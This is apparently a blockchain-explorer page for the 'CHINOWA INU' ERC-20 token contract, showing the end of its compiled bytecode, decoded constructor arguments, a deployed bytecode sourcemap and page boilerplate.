000816000190483118215151615610b6957610b69610b39565b500290565b60008219821115610b8157610b81610b39565b50019056fe4945524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726f4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220de8f1920ece38d3050a87ea5228bdacc3368abb8c21e71f4d856f476e678ee0a64736f6c634300080a0033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
00000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000012000000000000000000000000c02171c75bc28cd11715841cf45e8c5be91a8aee0000000000000000000000000000000000000000033b2e3c9fd0803ce8000000000000000000000000000000000000000000000000000000000000000000000b4348494e4f574120494e5500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000074348494e4f574100000000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : name_ (string): CHINOWA INU
Arg [1] : symbol_ (string): CHINOWA
Arg [2] : decimals_ (uint8): 18
Arg [3] : whiteshipAddr (address): 0xc02171c75bc28CD11715841cF45e8C5bE91A8aEE
Arg [4] : totalSupply_ (uint256): 1000000000000000000000000000
-----Encoded View---------------
9 Constructor Arguments found :
Arg [0] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000e0
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000012
Arg [3] : 000000000000000000000000c02171c75bc28cd11715841cf45e8c5be91a8aee
Arg [4] : 0000000000000000000000000000000000000000033b2e3c9fd0803ce8000000
Arg [5] : 000000000000000000000000000000000000000000000000000000000000000b
Arg [6] : 4348494e4f574120494e55000000000000000000000000000000000000000000
Arg [7] : 0000000000000000000000000000000000000000000000000000000000000007
Arg [8] : 4348494e4f574100000000000000000000000000000000000000000000000000
Deployed Bytecode Sourcemap
13804:6093:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14827:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15862:210;;;;;;:::i;:::-;;:::i;:::-;;;1218:14:1;;1211:22;1193:41;;1181:2;1166:18;15862:210:0;1053:187:1;15128:108:0;15216:12;;15128:108;;;1391:25:1;;;1379:2;1364:18;15128:108:0;1245:177:1;14125:31:0;;;;;;16080:455;;;;;;:::i;:::-;;:::i;15029:91::-;15103:9;;15029:91;;15103:9;;;;1902:36:1;;1890:2;1875:18;15029:91:0;1760:184:1;16543:300:0;;;;;;:::i;:::-;;:::i;14167:28::-;;;;;-1:-1:-1;;;;;14167:28:0;;;;;;-1:-1:-1;;;;;2113:32:1;;;2095:51;;2083:2;2068:18;14167:28:0;1949:203:1;15244:177:0;;;;;;:::i;:::-;-1:-1:-1;;;;;15395:18:0;15363:7;15395:18;;;:9;:18;;;;;;;15244:177;5597:94;;;:::i;:::-;;14083:31;;;;;;4946:87;4992:7;5019:6;-1:-1:-1;;;;;5019:6:0;4946:87;;14926:95;;;:::i;18039:374::-;;;;;;:::i;:::-;;:::i;16851:401::-;;;;;;:::i;:::-;;:::i;15429:216::-;;;;;;:::i;:::-;;:::i;15653:201::-;;;;;;:::i;:::-;-1:-1:-1;;;;;15819:18:0;;;15787:7;15819:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;15653:201;5846:192;;;;;;:::i;:::-;;:::i;14827:91::-;14872:13;14905:5;14898:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14827:91;:::o;15862:210::-;15981:4;16003:39;3744:10;16026:7;16035:6;16003:8;:39::i;:::-;-1:-1:-1;16060:4:0;15862:210;;;;:::o;16080:455::-;16220:4;16237:36;16247:6;16255:9;16266:6;16237:9;:36::i;:::-;16284:221;16307:6;3744:10;16355:139;16411:6;16355:139;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;16355:19:0;;;;;;:11;:19;;;;;;;;3744:10;16355:33;;;;;;;;;;:37;:139::i;:::-;16284:8;:221::i;:::-;-1:-1:-1;16523:4:0;16080:455;;;;;:::o;16543:300::-;3744:10;16658:4;16752:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;16752:34:0;;;;;;;;;;16658:4;;16680:133;;16730:7;;16752:50;;16791:10;16752:38;:50::i;5597:94::-;4992:7;5019:6;-1:-1:-1;;;;;5019:6:0;3744:10;5166:23;5158:68;;;;-1:-1:-1;;;5158:68:0;;3689:2:1;5158:68:0;;;3671:21:1;;;3708:18;;;3701:30;3767:34;3747:18;;;3740:62;3819:18;;5158:68:0;;;;;;;;;5662:21:::1;5680:1;5662:9;:21::i;:::-;5597:94::o:0;14926:95::-;14973:13;15006:7;14999:14;;;;;:::i;18039:374::-;17337:11;;-1:-1:-1;;;;;17337:11:0;3744:10;-1:-1:-1;;;;;17321:27:0;;17303:77;;;;-1:-1:-1;;;17303:77:0;;4050:2:1;17303:77:0;;;4032:21:1;4089:2;4069:18;;;4062:30;4128:29;4108:18;;;4101:57;4175:18;;17303:77:0;3848:351:1;17303:77:0;18237:13:::1;:30:::0;;-1:-1:-1;;;;;;18237:30:0::1;-1:-1:-1::0;;;;;18237:30:0;::::1;;::::0;;18268:16:::1;:36:::0;;;18305:16:::1;:36:::0;;;18370:35:::1;18305:36:::0;18268;18370:35:::1;:::i;:::-;18353:13;::::0;-1:-1:-1;;;;;18353:13:0::1;18343:24;::::0;;;:9:::1;:24;::::0;;;;:62;-1:-1:-1;;;;18039:374:0:o;16851:401::-;16971:4;16993:229;3744:10;17043:7;17065:146;17122:15;17065:146;;;;;;;;;;;;;;;;;3744:10;17065:25;;;;:11;:25;;;;;;;;-1:-1:-1;;;;;17065:34:0;;;;;;;;;;;;:38;:146::i;15429:216::-;15551:4;15573:42;3744:10;15597:9;15608:6;15573:9;:42::i;5846:192::-;4992:7;5019:6;-1:-1:-1;;;;;5019:6:0;3744:10;5166:23;5158:68;;;;-1:-1:-1;;;5158:68:0;;3689:2:1;5158:68:0;;;3671:21:1;;;3708:18;;;3701:30;3767:34;3747:18;;;3740:62;3819:18;;5158:68:0;3487:356:1;5158:68:0;-1:-1:-1;;;;;5935:22:0;::::1;5927:73;;;::::0;-1:-1:-1;;;5927:73:0;;4711:2:1;5927:73:0::1;::::0;::::1;4693:21:1::0;4750:2;4730:18;;;4723:30;4789:34;4769:18;;;4762:62;-1:-1:-1;;;4840:18:1;;;4833:36;4886:19;;5927:73:0::1;4509:402:1::0;5927:73:0::1;6011:19;6021:8;6011:9;:19::i;:::-;5846:192:::0;:::o;9032:98::-;9090:7;9117:5;9121:1;9117;:5;:::i;:::-;9110:12;9032:98;-1:-1:-1;;;9032:98:0:o;19273:382::-;-1:-1:-1;;;;;19409:19:0;;19401:69;;;;-1:-1:-1;;;19401:69:0;;5251:2:1;19401:69:0;;;5233:21:1;5290:2;5270:18;;;5263:30;5329:34;5309:18;;;5302:62;-1:-1:-1;;;5380:18:1;;;5373:35;5425:19;;19401:69:0;5049:401:1;19401:69:0;-1:-1:-1;;;;;19489:21:0;;19481:69;;;;-1:-1:-1;;;19481:69:0;;5657:2:1;19481:69:0;;;5639:21:1;5696:2;5676:18;;;5669:30;5735:34;5715:18;;;5708:62;-1:-1:-1;;;5786:18:1;;;5779:33;5829:19;;19481:69:0;5455:399:1;19481:69:0;-1:-1:-1;;;;;19563:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;19615:32;;1391:25:1;;;19615:32:0;;1364:18:1;19615:32:0;;;;;;;;19273:382;;;:::o;17418:613::-;-1:-1:-1;;;;;17558:20:0;;17550:71;;;;-1:-1:-1;;;17550:71:0;;6061:2:1;17550:71:0;;;6043:21:1;6100:2;6080:18;;;6073:30;6139:34;6119:18;;;6112:62;-1:-1:-1;;;6190:18:1;;;6183:36;6236:19;;17550:71:0;5859:402:1;17550:71:0;-1:-1:-1;;;;;17640:23:0;;17632:72;;;;-1:-1:-1;;;17632:72:0;;6468:2:1;17632:72:0;;;6450:21:1;6507:2;6487:18;;;6480:30;6546:34;6526:18;;;6519:62;-1:-1:-1;;;6597:18:1;;;6590:34;6641:19;;17632:72:0;6266:400:1;17632:72:0;17797:109;17833:6;17797:109;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;17797:17:0;;;;;;:9;:17;;;;;;;:109;:21;:109::i;:::-;-1:-1:-1;;;;;17777:17:0;;;;;;;:9;:17;;;;;;:129;;;;17940:20;;;;;;;:32;;17965:6;17940:24;:32::i;:::-;-1:-1:-1;;;;;17917:20:0;;;;;;;:9;:20;;;;;;;:55;;;;17988:35;;;;;;;;;;18016:6;1391:25:1;;1379:2;1364:18;;1245:177;11311:240:0;11431:7;11492:12;11484:6;;;;11476:29;;;;-1:-1:-1;;;11476:29:0;;;;;;;;:::i;:::-;-1:-1:-1;;;11527:5:0;;;11311:240::o;6046:173::-;6102:16;6121:6;;-1:-1:-1;;;;;6138:17:0;;;-1:-1:-1;;;;;;6138:17:0;;;;;;6171:40;;6121:6;;;;;;;6171:40;;6102:16;6171:40;6091:128;6046:173;:::o;14:597:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;452:6;449:1;446:13;443:91;;;522:1;517:2;508:6;497:9;493:22;489:31;482:42;443:91;-1:-1:-1;595:2:1;574:15;-1:-1:-1;;570:29:1;555:45;;;;602:2;551:54;;14:597;-1:-1:-1;;;14:597:1:o;616:173::-;684:20;;-1:-1:-1;;;;;733:31:1;;723:42;;713:70;;779:1;776;769:12;713:70;616:173;;;:::o;794:254::-;862:6;870;923:2;911:9;902:7;898:23;894:32;891:52;;;939:1;936;929:12;891:52;962:29;981:9;962:29;:::i;:::-;952:39;1038:2;1023:18;;;;1010:32;;-1:-1:-1;;;794:254:1:o;1427:328::-;1504:6;1512;1520;1573:2;1561:9;1552:7;1548:23;1544:32;1541:52;;;1589:1;1586;1579:12;1541:52;1612:29;1631:9;1612:29;:::i;:::-;1602:39;;1660:38;1694:2;1683:9;1679:18;1660:38;:::i;:::-;1650:48;;1745:2;1734:9;1730:18;1717:32;1707:42;;1427:328;;;;;:::o;2157:186::-;2216:6;2269:2;2257:9;2248:7;2244:23;2240:32;2237:52;;;2285:1;2282;2275:12;2237:52;2308:29;2327:9;2308:29;:::i;2348:484::-;2431:6;2439;2447;2455;2508:3;2496:9;2487:7;2483:23;2479:33;2476:53;;;2525:1;2522;2515:12;2476:53;2564:9;2551:23;2617:5;2610:13;2603:21;2596:5;2593:32;2583:60;;2639:1;2636;2629:12;2583:60;2662:5;-1:-1:-1;2686:38:1;2720:2;2705:18;;2686:38;:::i;:::-;2348:484;;2676:48;;-1:-1:-1;;;;2771:2:1;2756:18;;2743:32;;2822:2;2807:18;2794:32;;2348:484::o;2837:260::-;2905:6;2913;2966:2;2954:9;2945:7;2941:23;2937:32;2934:52;;;2982:1;2979;2972:12;2934:52;3005:29;3024:9;3005:29;:::i;:::-;2995:39;;3053:38;3087:2;3076:9;3072:18;3053:38;:::i;:::-;3043:48;;2837:260;;;;;:::o;3102:380::-;3181:1;3177:12;;;;3224;;;3245:61;;3299:4;3291:6;3287:17;3277:27;;3245:61;3352:2;3344:6;3341:14;3321:18;3318:38;3315:161;;;3398:10;3393:3;3389:20;3386:1;3379:31;3433:4;3430:1;3423:15;3461:4;3458:1;3451:15;3315:161;;3102:380;;;:::o;4204:127::-;4265:10;4260:3;4256:20;4253:1;4246:31;4296:4;4293:1;4286:15;4320:4;4317:1;4310:15;4336:168;4376:7;4442:1;4438;4434:6;4430:14;4427:1;4424:21;4419:1;4412:9;4405:17;4401:45;4398:71;;;4449:18;;:::i;:::-;-1:-1:-1;4489:9:1;;4336:168::o;4916:128::-;4956:3;4987:1;4983:6;4980:1;4977:13;4974:39;;;4993:18;;:::i;:::-;-1:-1:-1;5029:9:1;;4916:128::o
Swarm Source
ipfs://de8f1920ece38d3050a87ea5228bdacc3368abb8c21e71f4d856f476e678ee0a
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.